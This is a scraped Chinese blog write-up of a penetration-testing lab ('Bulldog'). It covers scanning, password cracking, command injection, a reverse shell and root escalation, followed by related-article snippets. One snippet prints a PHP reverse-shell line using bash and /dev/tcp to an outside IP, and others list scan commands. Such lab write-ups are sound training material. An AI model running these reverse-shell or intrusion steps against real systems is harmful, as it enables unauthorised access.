Bulldog靶机渗透

最新推荐文章于 2024-02-02 16:11:43 发布
最新推荐文章于 2024-02-02 16:11:43 发布
阅读量219 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: 安全 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Sher__lock/article/details/103588096

Bulldog靶机渗透

1. 获取地址IP,确定靶机IP是192.168.119.134

在这里插入图片描述

2.扫描目标主机信息

在这里插入图片描述

3.爆破目标主机目录

在这里插入图片描述

4.通过翻译得知这个网页是给承包商看的

在这里插入图片描述
在这里插入图片描述

5.查看网页的源码,查找有用信息

在这里插入图片描述

6.发现可以解码,使用md5解码,通过解码得知两个结果,bulldog Billdoglove

在这里插入图片描述
在这里插入图片描述

7.猜解密码

在这里插入图片描述
在这里插入图片描述

8.登陆进去,查看信息

在这里插入图片描述
在这里插入图片描述

9.尝试命令注入

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

10.监听端口,获取shell

在这里插入图片描述

11.开始提权

在这里插入图片描述
在这里插入图片描述

12.发现了一个隐藏目录,隐藏目录下存在两个文件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

13.猜解密码

在这里插入图片描述

14.打开一个新终端进行提权

在这里插入图片描述

15.获得root权限,提权成功

在这里插入图片描述

Sher__lock
关注
[网络安全自学篇] 七十五.Vulnhub靶机渗透bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 438
Bulldog1渗透实战 文章转载 靶机渗透测试实战(三)——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldogip ​ 【1】从新启动bulldog,到开页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 3164
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机Bulldog2 IP地址暂时未知; 测试:kali IP地址:192.168.37.131 测试:物理win7 二. 实验流程 信息收集——主发现 信息...
靶机渗透bulldog
学信安技术 卫国家之门
11-04 5311
一. bulldog靶机安装 1. 下载bulldog 靶场地址:Bulldog - VulnHub (可自行下载) 百度网盘:bulldog 提取码:qrnf 2. 将下载好的靶机存放在想存放的地方,建议放在其他虚拟相同的目录下 3. 打开VMware,左上角文件 - - 打开 - - 找到存放bulldog的位置 4. 开启bulldog(开启后无需进行其他操作) 二. bulldog靶机渗透 设备信息: kali(NAT)IP:192.168.110.140 bulldog(NAT)IP:
渗透靶机BULLDOG
qq_43235703的博客
02-02 1352
靶机渗透BULLDOG 渗透环境: 攻击:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
靶机渗透(一)——bulldog2
qq_45751902的博客
04-16 2704
一、靶机下载 靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova 二、bulldog2靶机搭建 将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,且修改靶机的网络,注意红框,下面能用到 修改完打开就是这样的 三、kali攻击 打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称) 四、攻击 1.在kali上查看ip ifconfig 发现ip地址为192.1
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 1083
一、实验环境 攻击(Kali):192.168.247.160 靶机bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
【vulnhub】---bulldog靶机
qq_43168364的博客
08-21 427
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:bolldog靶机(192.168.1.105) 攻击:kali Linux(192.168.1.104) 二、信息收集 主发现 或者用netdiscover也可以。命令:netdiscover -i eth0 -r 192.168.1.0/24 端口扫描,首先用masscan看看它开启了哪些端口,他的速度过快时貌似发现不了某些端口,可以多扫描几次。 使用nmap进行版本探测
bulldog2 靶机渗透
Sher__lock的博客
12-18 397
bulldog2 靶机渗透 1.先做主发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的源码,获取用户名 7.使用burpsuite抓用户登录的包,然后改包,创建一个新的用户 8.创建一个新的账户fxh 9.可以水平越权,使用注册好的用户账号登录,抓包,发现密码是明...
【VulnHub靶机渗透】一:BullDog2
野原新之助
03-20 1247
在网上大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试,熟悉了整体步骤,希望之后的靶机能越来越多的自己独立完成(大佬NB!),现将详细过程做如下整理。 简介 ...
bulldog渗透总结
qq_45300786的博客
06-13 480
运行环境: 测试:kali 靶机:bulludog 主发现 arp-scan -l 或者 netdiscover -i eth0 -r 192.168.223.0/24 或者 nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要扫) 扫描出来是192.168.223.233 端口扫描 masscan --rate=10000 -p0-65535 192.168.223.233 masscan扫描速度快,但准确度不高,可以多扫几次,以防漏扫 或者 nmap -sS 1
2.Bulldog渗透实战
qq_46389295的博客
03-25 397
攻击:Kali 攻击ip:192.168.56.102 主发现 端口扫描 版本侦测 访问80,8080端口是一样的网站 在http://192.168.56.101:8080界面没有发现有价值的信息 进行目录爆破 访问http://192.168.56.101:8080/admin/ 发现用户登录界面 访问http://192.168.56.101:8080/dev/ 新的网站将完...
反弹Shell原理与实现
m0_62451321的博客
11-14 3730
Windows作为攻击者主Linux是被入侵主(目标主),此时目标主上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户中了你的木马,但是它在局域网内,你直接连接不了。
靶机渗透bulldog靶机渗透练习_strings命令使用+反弹shell方法
serendipity1130的博客
08-31 852
靶机ip无法获取问题的解决方法: 1.重启bulldog,到开页面选择第二个Ubuntu的高级选项。 2.进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 3.选择root一行回车,进入命令行模式 4.输入 mount -o rw,remount / 5.输入 ifconfig -a (查看网卡名称) 6.输入 vim /etc/network/interfaces ,修改网卡名称成查询的结果,保存后输入reboot重启即可。 auto ens33 iface ens33 i
bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行&&绕过 反弹shell string分析文件得到密码提权
YouthBelief的博客
11-30 2082
bulldog-1靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web漏洞思路ssh 利用思路步骤1:浏览网页 爆破目录步骤二: 破解hash步骤三:利用密码登录后台步骤四:利用命令执行(需要尝试绕过方法)步骤五:反弹shell0x03 提升权限步骤六:查看系统用户,确定需要关注的用户步骤七:查找每个用户的文件步骤八:拼接root密码提权0x04 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/bulldog/bulld
靶机渗透(二)bulldog1
qq_42180996的博客
04-26 1674
靶机bulldog1 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试IP地址,判断所处网段 2.主发现(netdiscover) 3.端口扫描(masscan/namp) (二)http服务(80/8080端口) 1.靶机开启apache服务,尝试web渗透 2.网站指纹信息扫描(whatweb) 3.目录扫描(dirb) 4.查看/admin页面 5....
渗透项目Bulldog网站渗透
命运的旋律的博客
12-13 826
Bulldog网站渗透 文章目录Bulldog网站渗透1.渗透思路测试环境测试步骤1.信息收集主发现端口扫描操作系统扫描2.漏洞探测网站指纹信息扫描目录扫描3.信息利用4.漏洞利用5.权限提升 1.渗透思路 进行信息收集,根据开放的端口以及服务,寻找可行的渗透方法 在未知目标主的情况下,使用netdiscover主发现获得主IP地址 得到主的IP地址后,使用masscan进行快速的端口...
反弹shell原理和实现
u012830303的博客
01-18 3670
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
靶机实战(bulldog)
weixin_45605313的博客
05-28 459
bulldog实验环境实验过程信息收集1.主发现2.端口扫描3.目录扫描4.web站指纹5.漏洞发现漏洞利用提权总结 实验环境 靶机bulldog 测试:win10 ,kali 实验过程 信息收集 1.主发现 靶机ip:192.168.238.146 2.端口扫描 先用masscan进行快速全面的扫描 nmap扫描得到端口服务信息 3.目录扫描 访问80,web服务进行目录扫描 4.web站指纹 以python环境搭建web 5.漏洞发现 1.尝试ssh弱口令:利用msf,hydra等
vulnhub-bulldog2靶机渗透扫描不出靶机ip
最新发布
04-03
### 关于VulnHub Bulldog2靶机无法扫描到IP的解决方案 在渗透测试过程中,如果遇到无法通过常规手段扫描到目标主的情况,可以尝试多种技术组合来定位目标主。以下是针对此问题的具体分析和建议: #### 使用ARP扫描工具 当标准的`ping`或`nmap`扫描未能发现目标主时,可以通过局域网内的ARP广播请求找到活动设备。例如,在引用中提到的方法3使用了`netdiscover`命令[^3]: ```bash netdiscover -r 192.168.44.0/24 -i eth0 ``` 上述命令会向指定子网发送ARP请求监听响应,从而识别出网络中的活跃主。 #### 调整Nmap参数优化扫描效果 除了传统的ICMP Ping外,还可以利用TCP SYN包或其他协议类型的探测方式提高成功率。比如下面这条指令包含了服务版本检测(-sV),隐秘模式(SYN半开扫描-sS)以及调整时间模板至更快执行速度(T4)[^2]: ```bash nmap -sS -sV -T4 192.168.11.19 ``` 另外值得注意的是,有时防火墙可能阻止来自外部源地址的数据包进入内部网络;因此有必要确认Kali Linux所在环境与Bulldog2 VM之间确实处于同一物理或者逻辑二层交换结构下(即两者能够互相访问对方MAC层面的信息). #### 测试Telnet/TCP连接验证特定端口状态 即使整体Ping不通某个节点,但如果已知其开放的服务端口号,则可以直接发起相应层次上的握手过程来进行判断是否存在可交互对象。正如材料里所描述那样,“尝试远程连接23端口后失败。”这表明虽然telnet未成功建立session,但仍不失为一种排查思路之一[^1]. 综上所述,对于找不到vulnhub bulldog2 IP这一难题,可以从多个角度出发寻找突破口:一方面借助专门设计用于本地网段探索的应用程序如NetDiscover;另一方面灵活运用高级配置选项丰富的侦查利器-NMAP,辅以其他辅助性操作进一步缩小范围直至最终锁定确切位置。 ```python import os def scan_network(): command = 'netdiscover -r 192.168.44.0/24 -i eth0' result = os.popen(command).read() print(result) scan_network() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值